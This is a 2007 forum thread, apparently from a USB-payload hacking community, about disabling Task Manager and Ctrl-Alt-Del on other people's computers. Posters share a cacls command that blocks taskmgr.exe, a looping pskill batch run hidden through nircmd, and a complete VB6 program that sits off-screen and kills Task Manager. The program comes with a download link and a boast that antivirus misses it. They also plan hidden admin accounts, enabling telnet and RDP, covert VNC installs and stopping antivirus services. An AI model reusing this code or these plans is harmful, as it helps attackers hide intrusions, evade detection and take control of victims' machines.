G-Stress Posted December 30, 2007 Share Posted December 30, 2007 Has anyone thought of, or implemented a method to disable Ctrl alt del or taskmgr? I figured out an easy way to disable it and thought about trying to re-map the ctrl alt del keys to something else... just an idea Quote Link to comment Share on other sites More sharing options...
Sparda Posted December 30, 2007 Share Posted December 30, 2007 It can be done easily in the registry... If some one can be bothered looking up how to do it. Except this is a dead give away that some ones computer is infected. Quote Link to comment Share on other sites More sharing options...
G-Stress Posted December 30, 2007 Author Share Posted December 30, 2007 True, but I didn't use the registry. That was the supposedly simplest way of disabling it, but the so called registry entries weren't even in my registry and I didn't try to create them. I used cacls to disable it from the current logged on user. Trying to figure out now how to disable it for only maybe 30 seconds or so. Quote Link to comment Share on other sites More sharing options...
SomeoneE1se Posted December 30, 2007 Share Posted December 30, 2007 rename taskmgr.exe Quote Link to comment Share on other sites More sharing options...
digip Posted December 30, 2007 Share Posted December 30, 2007 rename taskmgr.exe Like Explorer.exe, it will put a new copy out there(or at least it should) from dll cache files or backups. You have to logged on in safe mode, rename the file in dll cache(that it pulls a backup from) an dthen rename the file. I used this method to update a file so I can make my own themes that wouldn't run under the original uxtheme dll file. All system files should automatically replace themself, and if they don't you can use somehting like system file checker to get it back. http://en.wikipedia.org/wiki/System_File_Checker Quote Link to comment Share on other sites More sharing options...
G-Stress Posted December 30, 2007 Author Share Posted December 30, 2007 Yea I've read about renaming and deleting the file and that it will create a backup upon next reboot or so. I'm just disabling it for about 30 seconds or so. I used: cacls c:windowssystem32taskmgr.exe /D %COMPUTERNAME%%USERNAME% which seems to work just fine for now. I just am trying to figure out how to re-enable it again but after 30 seconds exactly. cacls c:windowssystem32taskmgr.exe /g %COMPUTERNAME%%USERNAME%:r re-enables it to the current logged on user with read only access which is fine I just want that command to execute exactly 30 seconds after it has been disabled. The only way I can think of is to ping the localhost and try to do it for only 30 seconds somehow. Quote Link to comment Share on other sites More sharing options...
SomeoneE1se Posted December 30, 2007 Share Posted December 30, 2007 call sleep.bat from the file flashDrive:filessleep.exe 30 fix.reg Quote Link to comment Share on other sites More sharing options...
G-Stress Posted December 30, 2007 Author Share Posted December 30, 2007 @ SomeoneElse, Where are you getting sleep.exe from? Quote Link to comment Share on other sites More sharing options...
G-Stress Posted December 30, 2007 Author Share Posted December 30, 2007 Nevermind, I found it in the w2k Resource Kit, I thought I'd seen something like this before. Thanks, but what exactly is fix.reg? Quote Link to comment Share on other sites More sharing options...
SomeoneE1se Posted December 30, 2007 Share Posted December 30, 2007 it's a .reg fix that will changed what you did just replace it with however you want to fix the changes Quote Link to comment Share on other sites More sharing options...
G-Stress Posted December 30, 2007 Author Share Posted December 30, 2007 oh so basically you were just using fix.reg as an example? It's not a real file? sleep.exe doesn't seem to do anything besides pause for a period of time which is exactly what I wanted, I did however create an anti-dote. Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted December 30, 2007 Share Posted December 30, 2007 also in gpedit.msc Quote Link to comment Share on other sites More sharing options...
SomeoneE1se Posted December 30, 2007 Share Posted December 30, 2007 oh so basically you were just using fix.reg as an example? It's not a real file? sleep.exe doesn't seem to do anything besides pause for a period of time which is exactly what I wanted, I did however create an anti-dote. it doesn't.... Quote Link to comment Share on other sites More sharing options...
G-Stress Posted December 30, 2007 Author Share Posted December 30, 2007 @ sablefoxx, Yea I knew I could disable it in gpedit, just didn't know how to implement that in a batch. Quote Link to comment Share on other sites More sharing options...
Xqtftqx Posted December 30, 2007 Share Posted December 30, 2007 This whould be a great addon to xqtftqx payload, dont ya think stablefoxx? if you can send me a batch file to disable it Quote Link to comment Share on other sites More sharing options...
remkow Posted December 30, 2007 Share Posted December 30, 2007 I don't see why you would want to disable taskmanager... If the user actually tries to use it, and it doesn't work, they will immedeately know something's wrong. Quote Link to comment Share on other sites More sharing options...
excid3 Posted December 30, 2007 Share Posted December 30, 2007 Depends on the user...i know for one thing my parents would have no idea how to fix it and are too afraid to modify the registry for fear of breaking Windows. It would be a great little addition you could add for those not-so-experienced Windows users. Renaming the executable would really mess with them too. Can't hurt to add it to the payload, like everything else, you can enable/disable it at your own liking. Personally I think it would be fun. Ya its kind of obvious, but that will just make them wonder who/how that got disabled. I love playing pranks with the hacksaw 8-) Friend of mine reinstalled Windows last week because I VNCed into his comp and started messing with him. He freaked. I'm gonna go disable Ctrl-Alt-Delete on him now...hes not techy enough to figure that one out. hehe... Quote Link to comment Share on other sites More sharing options...
digip Posted December 30, 2007 Share Posted December 30, 2007 Better would be a Task Manager clone that hides your progrms from showing up in it, or making a registry file that points to your version of a Taskmanager.exe on a thumb drive that hides your programs from being seen and then reverts back at the end of your payload to the original Taskmanager on exit. This way they can still use Task Manager to end certain programs but yours never show up in Taskmanager. If I remember correctly, there are some Taskmanager clones on PSC in VB6, so all you need to do is make the GUI look identical to the system your on and your pretty much golden. Make several variants to match the OS, like one for XP, 2000, Server 2003, etc. They all look similar anyway so some people might not even notice. And since it's not a virus, it shouldn't set off any alerts, although ZoneAlarm seems to ask to allow EVERY program to run if it is set up properly. IIt will be defeated if someone checks msinfo32.exe because they can see running tasks in there as well. But then again, you could do the same thing here and make a clone that filters out your running payloads. Quote Link to comment Share on other sites More sharing options...
G-Stress Posted December 30, 2007 Author Share Posted December 30, 2007 @ remkow, Yea it would make it a bit obvious something is going on that's why I only wanted to disable it for about 30 seconds then re-enable. @ digip, I'm liking that idea alot :) actually I had something similar in mind that would be a 3 step process. It would start out maybe just enabling telnet, rdp and creating a hidden admin user. Then IF the user presses a series of keys e.g. ctrl+alt+del then it will launch step 2 and do a virus killer, etc. Then if they try to run taskmgr.exe at all then launch step 3 which would be maybe vnc install something like that. Quote Link to comment Share on other sites More sharing options...
digip Posted December 30, 2007 Share Posted December 30, 2007 @ remkow, Yea it would make it a bit obvious something is going on that's why I only wanted to disable it for about 30 seconds then re-enable. @ digip, I'm liking that idea alot :) actually I had something similar in mind that would be a 3 step process. It would start out maybe just enabling telnet, rdp and creating a hidden admin user. Then IF the user presses a series of keys e.g. ctrl+alt+del then it will launch step 2 and do a virus killer, etc. Then if they try to run taskmgr.exe at all then launch step 3 which would be maybe vnc install something like that. You will have to put hooks in there to check for getting taskmanager from other places to though. Like right clicking the taskbar or "start/run/taskmgr" Quote Link to comment Share on other sites More sharing options...
G-Stress Posted December 30, 2007 Author Share Posted December 30, 2007 @ digip, yea that's exactly why I said if taskmgr.exe is attempted to run at all that specific process then execute step 3, hooks are you referring to ( )? Sorry i'm still a newbie at batch :? Quote Link to comment Share on other sites More sharing options...
sc0rpi0 Posted December 31, 2007 Share Posted December 31, 2007 My method is kind of ghetto, but it works well. make a batch file like this with pskill. Have it launched using nircmd with this command: nircmd execmd [batch file name] :begin pskill -t "TASKMGR.EXE" :goto begin Quote Link to comment Share on other sites More sharing options...
digip Posted December 31, 2007 Share Posted December 31, 2007 Here is a little vb6 app that when run, hides it off screen and captures the delete key as well as mouse movements, so if they right click the taskbar to start taskmgr or use start/run or even windowskey+R to load a run box and manually run taskmgr, it kills taskmgr from running. Press F12 and it unloads the program, or add another timer and kill the vb6 program after so many minutes. 'End Taskmgr in Windows XP '12/31/2007 - DigiP ' 'Following Line allows ShellExecute commands Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long 'Mouse Detection Src Code: http://www.daniweb.com/forums/thread101100.html Private Type POINTAPI   X As Long   Y As Long End Type Private Declare Function GetCursorPos Lib "User32" (lpPoint As POINTAPI) As Long Private Sub Form_KeyUp(KeyCode As Integer, Shift As Integer) On Error GoTo poo If KeyCode = vbKeyDelete Then 'Because we only want to check if delete is pressed in combo with ctrl+alt+del MakeNotTopMost (Me.hWnd) ShellExecute 0&, vbNullString, "TASKKILL", " /F /IM taskmgr.exe", vbNullString, vbHide End If MakeTopMost (Me.hWnd) 'Change this to whatever you want! If KeyCode = vbKeyF12 Then Unload Me Exit Sub poo: MakeTopMost (Me.hWnd) Exit Sub End Sub Private Sub Timer1_Timer() Dim Point As POINTAPI Dim lngReturn As Long Dim lngScreenX As Long Dim lngScreenY As Long lngReturn = GetCursorPos(Point) lngScreenX = Point.X lngScreenY = Point.Y ' Enter Code to whatever you want with the results ' 'Debug.Print "X-pos: " & lngScreenX & " , Y-pos: " & lngScreenY On Error GoTo poo MakeNotTopMost (Me.hWnd) ShellExecute 0&, vbNullString, "TASKKILL", " /F /IM taskmgr.exe", vbNullString, vbHide MakeTopMost (Me.hWnd) Exit Sub poo: MakeTopMost (Me.hWnd) Exit Sub End Sub Create a form and add timer to it (Set the interval to like 2000 which is 2 seconds or 1000 for 1 second). Then resize the form to like 10x10 pixels and make its start up position off screen. Done. Full source project download as well as working EXE file: http://www.twistedpairrecords.com/digip/ctrled.rar And BTW, virus scanners do not detect it since it really isnt malicious code, just built in Windows functions. Will not work on anything older than xp since taskmgr is not a program on 98 or 95 and taskkill is an XP system program. This can still be detected and defeted by opening cmd.exe and typing in tasklist to see whats running. Then killing it with: taskkill /F /IM ctrled.exe I leave it up to you if you also want to kill cmd.exe or command.com, but leave yourself a way to end it safely or it will run forever until you reboot. Quote Link to comment Share on other sites More sharing options...
G-Stress Posted December 31, 2007 Author Share Posted December 31, 2007 @ digip, Nice one. I'll have to play around with that. Hmmm... how bout not kill cmd, but really restrict it to limited usage... actually... I wonder if there is a app cmd-like that when a user runs cmd or command.com those commands are mapped to a custom "shell" a fake shell something that would not allow the user to run admin commands, but appear as normal shell... I got quite a few idea's in mind I would like to create something not so much as to do damage, but to really make a user think. @ Sc0rpi0, Yea I plan to use pskill to kill all existing av/spyware processes... or wouldn't it be better if instead of killing the process just stop the service temporarily ;) Quote Link to comment Share on other sites More sharing options...
digip Posted December 31, 2007 Share Posted December 31, 2007 Just so you know, my vb app does not get detected by any anti virus software: http://www.virustotal.com/analisis/60fa6d1...3ba0d76237a8bd2 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.